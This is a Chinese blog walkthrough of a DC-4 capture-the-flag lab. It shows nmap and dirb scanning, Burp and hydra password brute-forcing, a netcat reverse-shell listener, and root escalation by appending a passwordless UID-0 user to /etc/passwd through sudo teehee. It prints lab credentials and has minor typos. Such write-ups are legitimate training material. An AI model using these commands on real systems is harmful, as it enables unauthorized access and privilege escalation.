DC-4靶机渗透过程

十七楠楠

已于 2022-04-19 23:14:13 修改

阅读量2.9k

点赞数

文章标签：网络安全

于 2022-04-19 23:11:15 首次发布

本文链接：https://blog.csdn.net/xznswd/article/details/124286340

版权

DC-4靶机渗透过程

实验环境:kali ，DC-4(网卡需要一样，这边用的是NAT模式)
kali：192.168.200.3 DC-4:192.168.200.4

使用ifconfig查看kali的IP，在用nmap命令查看该网段的IP地址找出DC-4的IP

┌──(root💀kali)-[/home/shiqi/桌面]
└─# nmap -sP 192.168.200.0/24

信息收集，发现开放了22端口和80端口

┌──(root💀kali)-[/home/shiqi/桌面]
└─# nmap -sV 192.168.200.4                                                  1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-19 15:18 CST
Nmap scan report for 192.168.200.4
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    nginx 1.15.10
MAC Address: 00:0C:29:D1:99:66 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

访问端口，浏览器访问DC-4的IP地址（根据提示得出登录账号为admin）

目录扫描，dirb命令

┌──(root💀kali)-[/usr/share/wordlists]
└─# dirb http://192.168.200.4                                                                                                                                                                              255 ⨯ 1 
START_TIME: Tue Apr 19 19:52:14 2022
URL_BASE: http://192.168.200.4/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.200.4/ ----
==> DIRECTORY: http://192.168.200.4/css/                                                                                                                                                                            
==> DIRECTORY: http://192.168.200.4/images/                                                                                                                                                                         
+ http://192.168.200.4/index.php (CODE:200|SIZE:506)                                                                                                         
---- Entering directory: http://192.168.200.4/css/ ----

---- Entering directory: http://192.168.200.4/images/ ----
 
-----------------
END_TIME: Tue Apr 19 19:52:24 2022
DOWNLOADED: 13836 - FOUND: 1
## 得出后台登录主页是http://192.168.200.4/index.php

爆破密码（我使用的是burp软件爆破方式）步骤截图省略

##破解出来密码为happy
登录进去发现只有三个选项，使用burp抓包，看是否可以用其他的命令，发现可以

反向反弹shell

──(root💀kali)-[/etc/network/interfaces.d]
└─# nc -lvp 7777                                                                                                                                                                                                 2 ⚙
listening on [any] 7777 ...
192.168.200.4: inverse host lookup failed: Unknown host
connect to [192.168.200.3] from (UNKNOWN) [192.168.200.4] 36838
ls
command.php
css
images
whoami
www-data
cd /home
ls
charles
jim
sam
ls -l

ls -lh sam
total 0
ls -lh charles
total 0
ls -lh jim  发现jim账户有异常
total 12K
drwxr-xr-x 2 jim jim 4.0K Apr  7  2019 backups
-rw------- 1 jim jim  528 Apr  6  2019 mbox
-rwsrwxrwx 1 jim jim  174 Apr  6  2019 test.sh
ls
backups  mbox  test.sh  进入jim目录发现有三个文件，backups目录下有old-passwd.bak应该是密码，直接复制粘贴创建新文本，而mbox目录没有访问权限

hydra 爆破ssh密码破解出密码为jibri104

──(root💀kali)-[/home/shiqi/桌面]
└─# hydra -l jim -P passwd -T 64 ssh://192.168.200.4:22
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-19 21:30:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 253 login tries (l:1/p:253), ~16 tries per task
[DATA] attacking ssh://192.168.200.4:22/
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 77 to do in 00:01h, 16 active
[22][ssh] host: 192.168.200.4   login: jim   password: jibril04

登录jim账户

┌──(root💀kali)-[/home/shiqi/桌面]
└─# ssh jim@192.168.200.4
im@dc-4:~$ su root
Password: 
su: Authentication failure  尝试提权，发现不可以
im@dc-4:~$ ls
backups  mbox  test.sh 
jim@dc-4:~$ cat mbox   再次查看上一步权限不够的文件，发现可以查看成功，是一封邮件，是root用户本地发送的
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)

jim@dc-4:~$ cd /var/mail/
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim   
Password is:  ^xHhA&hvim0y   获得用户Charles密码^xHhA&hvim0y

i切换到charles用户

jim@dc-4:/var/mail$ su charles 
Password: 
charles@dc-4:/var/mail$ 
尝试提权发现可以sudo免密teech
harles@dc-4:/var/mail$ sudo -l
    (root) NOPASSWD: /usr/bin/teehee

创建admin并授权免密登录

charles@dc-4:/var/mail$ echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd  
admin::0:0:::/bin/bash
charles@dc-4:/var/mail$ su admin
root@dc-4:/var/mail# ls
jim
root@dc-4:/var/mail# whoami
root
用find命令找出flag文件所在位置
oot@dc-4:/etc# find / -name flag*
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/virtual/net/lo/flags
/root/flag.txt
root@dc-4:/etc# cd /root
root@dc-4:/root# cat flag.txt   显示出flag即成功